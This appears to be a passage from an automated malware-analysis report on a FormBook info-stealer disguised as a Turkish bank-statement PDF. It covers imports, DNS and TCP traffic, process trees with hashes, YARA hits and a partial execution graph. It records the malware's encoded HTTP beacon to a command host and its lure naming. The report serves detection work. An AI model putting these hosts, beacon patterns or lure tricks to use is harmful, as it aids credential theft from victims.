                                        RT_VERSION0x3b7580x24cdataEnglishUnited States
                                        RT_MANIFEST0x3b9a80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                        Imports

                                        DLLImport
                                        ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                        SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                        ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                        USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        192.168.2.38.8.8.858921532023883 02/23/23-10:24:31.760663UDP2023883ET DNS Query to a *.top domain - Likely Hostile5892153192.168.2.38.8.8.8

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Feb 23, 2023 10:24:31.879828930 CET4969980192.168.2.3107.148.8.96
                                        Feb 23, 2023 10:24:32.072673082 CET8049699107.148.8.96192.168.2.3
                                        Feb 23, 2023 10:24:32.072911978 CET4969980192.168.2.3107.148.8.96
                                        Feb 23, 2023 10:24:32.073069096 CET4969980192.168.2.3107.148.8.96
                                        Feb 23, 2023 10:24:32.271388054 CET8049699107.148.8.96192.168.2.3
                                        Feb 23, 2023 10:24:32.271436930 CET8049699107.148.8.96192.168.2.3
                                        Feb 23, 2023 10:24:32.272330999 CET8049699107.148.8.96192.168.2.3
                                        Feb 23, 2023 10:24:32.272394896 CET4969980192.168.2.3107.148.8.96
                                        Feb 23, 2023 10:24:32.272803068 CET4969980192.168.2.3107.148.8.96
                                        Feb 23, 2023 10:24:32.465361118 CET8049699107.148.8.96192.168.2.3
                                        Feb 23, 2023 10:24:42.550945997 CET4970180192.168.2.3194.102.227.30
                                        Feb 23, 2023 10:24:45.631464958 CET4970180192.168.2.3194.102.227.30
                                        Feb 23, 2023 10:24:51.647906065 CET4970180192.168.2.3194.102.227.30
                                        Feb 23, 2023 10:25:05.726290941 CET4970180192.168.2.3194.102.227.30
                                        Feb 23, 2023 10:25:08.773997068 CET4970180192.168.2.3194.102.227.30
                                        Feb 23, 2023 10:25:14.774523973 CET4970180192.168.2.3194.102.227.30
                                        Feb 23, 2023 10:25:27.830609083 CET4970180192.168.2.3194.102.227.30
                                        Feb 23, 2023 10:25:30.823786020 CET4970180192.168.2.3194.102.227.30
                                        Feb 23, 2023 10:25:36.839010954 CET4970180192.168.2.3194.102.227.30
                                        Feb 23, 2023 10:25:50.051094055 CET4970280192.168.2.3194.102.227.30
                                        Feb 23, 2023 10:25:51.043243885 CET4970280192.168.2.3194.102.227.30
                                        Feb 23, 2023 10:25:53.059010983 CET4970280192.168.2.3194.102.227.30

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Feb 23, 2023 10:24:31.760663033 CET5892153192.168.2.38.8.8.8
                                        Feb 23, 2023 10:24:31.864119053 CET53589218.8.8.8192.168.2.3
                                        Feb 23, 2023 10:24:42.472563028 CET4997753192.168.2.38.8.8.8
                                        Feb 23, 2023 10:24:42.548671961 CET53499778.8.8.8192.168.2.3
                                        Feb 23, 2023 10:25:05.704871893 CET5784053192.168.2.38.8.8.8
                                        Feb 23, 2023 10:25:05.722182989 CET53578408.8.8.8192.168.2.3
                                        Feb 23, 2023 10:25:27.810179949 CET5799053192.168.2.38.8.8.8
                                        Feb 23, 2023 10:25:27.829524040 CET53579908.8.8.8192.168.2.3
                                        Feb 23, 2023 10:25:50.014162064 CET5238753192.168.2.38.8.8.8
                                        Feb 23, 2023 10:25:50.033555031 CET53523878.8.8.8192.168.2.3

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Feb 23, 2023 10:24:31.760663033 CET192.168.2.38.8.8.80x2023Standard query (0)www.wenzid4.topA (IP address)IN (0x0001)false
                                        Feb 23, 2023 10:24:42.472563028 CET192.168.2.38.8.8.80xc493Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                        Feb 23, 2023 10:25:05.704871893 CET192.168.2.38.8.8.80x5622Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                        Feb 23, 2023 10:25:27.810179949 CET192.168.2.38.8.8.80x42ebStandard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                        Feb 23, 2023 10:25:50.014162064 CET192.168.2.38.8.8.80x6229Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Feb 23, 2023 10:24:31.864119053 CET8.8.8.8192.168.2.30x2023No error (0)www.wenzid4.top107.148.8.96A (IP address)IN (0x0001)false
                                        Feb 23, 2023 10:24:42.548671961 CET8.8.8.8192.168.2.30xc493No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                        Feb 23, 2023 10:24:42.548671961 CET8.8.8.8192.168.2.30xc493No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                        Feb 23, 2023 10:25:05.722182989 CET8.8.8.8192.168.2.30x5622No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                        Feb 23, 2023 10:25:05.722182989 CET8.8.8.8192.168.2.30x5622No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                        Feb 23, 2023 10:25:27.829524040 CET8.8.8.8192.168.2.30x42ebNo error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                        Feb 23, 2023 10:25:27.829524040 CET8.8.8.8192.168.2.30x42ebNo error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                        Feb 23, 2023 10:25:50.033555031 CET8.8.8.8192.168.2.30x6229No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                        Feb 23, 2023 10:25:50.033555031 CET8.8.8.8192.168.2.30x6229No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • www.wenzid4.top

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.349699107.148.8.9680C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Feb 23, 2023 10:24:32.073069096 CET102OUTGET /ghii/?XdZ7vzmO=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==&IM4=qwV6CUVoIAuPXv HTTP/1.1
                                        Host: www.wenzid4.top
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Feb 23, 2023 10:24:32.271436930 CET102INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Thu, 23 Feb 2023 09:22:37 GMT
                                        Content-Type: text/html
                                        Content-Length: 146
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:10:23:49
                                        Start date:23/02/2023
                                        Path:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                        Imagebase:0x400000
                                        File size:299068 bytes
                                        MD5 hash:9AD124BF22839603024A373BA636532B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Target ID:1
                                        Start time:10:23:49
                                        Start date:23/02/2023
                                        Path:C:\Users\user\AppData\Local\Temp\dlcmto.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf
                                        Imagebase:0x1190000
                                        File size:93184 bytes
                                        MD5 hash:00463A9A4FBFEE77A95181CC2C45A9B4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 23%, ReversingLabs
                                        Reputation:low

                                        General

                                        Target ID:2
                                        Start time:10:23:49
                                        Start date:23/02/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:3
                                        Start time:10:23:50
                                        Start date:23/02/2023
                                        Path:C:\Users\user\AppData\Local\Temp\dlcmto.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\dlcmto.exe
                                        Imagebase:0x1190000
                                        File size:93184 bytes
                                        MD5 hash:00463A9A4FBFEE77A95181CC2C45A9B4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.297682899.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.297682899.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.297682899.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.297724728.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.297724728.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.297724728.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        Reputation:low

                                        General

                                        Target ID:4
                                        Start time:10:23:54
                                        Start date:23/02/2023
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff69fe90000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:8
                                        Start time:10:24:08
                                        Start date:23/02/2023
                                        Path:C:\Windows\SysWOW64\autoconv.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\SysWOW64\autoconv.exe
                                        Imagebase:0xdd0000
                                        File size:851968 bytes
                                        MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        General

                                        Target ID:9
                                        Start time:10:24:08
                                        Start date:23/02/2023
                                        Path:C:\Windows\SysWOW64\explorer.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                        Imagebase:0x110000
                                        File size:3611360 bytes
                                        MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.517154599.0000000004450000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.517154599.0000000004450000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.517154599.0000000004450000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.515846426.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.515846426.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.515846426.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.517245778.0000000004480000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.517245778.0000000004480000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.517245778.0000000004480000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        Reputation:high

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:15.9%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:16.4%
                                          Total number of Nodes:1385
                                          Total number of Limit Nodes:25
                                          execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 